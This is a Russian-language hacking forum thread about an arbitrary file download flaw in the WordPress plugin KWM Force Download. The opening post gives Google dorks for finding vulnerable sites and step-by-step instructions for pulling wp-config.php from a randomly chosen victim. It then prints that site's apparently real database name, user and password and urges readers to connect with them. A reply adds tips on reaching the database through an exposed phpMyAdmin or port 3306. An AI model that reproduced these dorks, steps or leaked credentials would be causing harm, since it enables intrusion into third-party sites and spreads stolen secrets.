1. Рады видеть Вас на XenforoTest!

    У нас Вы можете скачать:

    Перед регистрацией рекомендую ознакомиться

    с Условиями скачивания определённых плагинов и Правилами форума.

    Присоединяйтесь! Учите и обучайтесь!

    Скрыть объявление

Заметка Wordpress - загрузка любого файла

Тема в разделе "Альтернатива XenForo", создана пользователем ccvata, 13 авг 2016.

  1. ccvata

    Проверенный

    Сообщения:
    44
    Симпатии:
    13
    Баллы:
    8
    Дата обнаружения: 07/08/2016
    Уязвимость позволяет загрузить любой файл который лежит на сервере
    Названия плагина : KWM Force Download
    Dork 1 : inurl:force-download.php?file=wp-content/uploads
    Dork 2 : inurl:wp-content/uploads inurl:force-download.php?file=

    Порядок действий:

    1) Заходи в гугл и вставляю любую из дорок выше
    2) Выбираем любой сайт (например я взял первый

    Вы не можете просматривать внешние ссылки, вам необходимо зарегистрироваться или войти

    )
    3)Копируем этот url и изменяем так как нам нужно
    4)У меня получается вот так (

    Вы не можете просматривать внешние ссылки, вам необходимо зарегистрироваться или войти

    )
    5)Готово! Теперь открываем файл wp-config и используем так как нам нужно :)

    Notice: эти данные можно использовать для подключения к бд!:) (достаточно только найти хост на котором стоит сайт)

    /** The name of the database for WordPress */
    define('DB_NAME', 'globalvo_dbforglobal');

    /** MySQL database username */
    define('DB_USER', 'globalvo_globalv');

    /** MySQL database password */
    define('DB_PASSWORD', '[email protected]+G^V2$ea');

    /** MySQL hostname */
    define('DB_HOST', 'localhost');

    /** Database Charset to use in creating database tables. */
    define('DB_CHARSET', 'utf8');

    /** The Database Collate type. Don't change this if in doubt. */
    define('DB_COLLATE', '');

     
    • Нравится Нравится x 3
  2. X-Oleg

    Местный

    Сообщения:
    570
    Симпатии:
    567
    Баллы:
    93
    Это если пхпмайадмин незалочен например, также можно подцепится если порт 3306 неблок !

    Вообще плагины для вордпресса это вообще кошмар, очень нужно осторожно !
     
    • Нравится Нравится x 1
Похожие темы
  1. JiM
    Ответов:
    18
    Просмотров:
    503
  2. SOUL
    Ответов:
    5
    Просмотров:
    1.132
  3. xsacha
    Ответов:
    0
    Просмотров:
    162
  4. medumuz
    Ответов:
    3
    Просмотров:
    121
  5. ccvata
    Ответов:
    3
    Просмотров:
    292
Загрузка...
Rambler's Top100 Яндекс.Метрика INTERKASSA
XenforoTest.ru